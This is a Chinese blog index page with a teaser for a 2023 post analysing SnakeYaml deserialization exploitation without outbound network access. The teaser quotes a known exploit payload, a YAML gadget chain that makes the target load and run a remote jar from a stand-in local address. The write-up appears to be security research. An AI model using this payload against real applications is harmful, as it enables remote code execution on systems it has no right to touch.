会员
周边
众包
新闻
博问
闪存
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
功夫小熊猫
博客园
首页
新随笔
联系
订阅
管理
2023年2月25日
SnakeYaml的不出网反序列化利用分析
摘要: SnakeYaml的常见出网利用方式: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:9000/yaml-payload.jar"] ]] ] 不
阅读全文
posted @ 2023-02-25 23:37 功夫小熊猫
阅读(349)
评论(0)
推荐(2)
编辑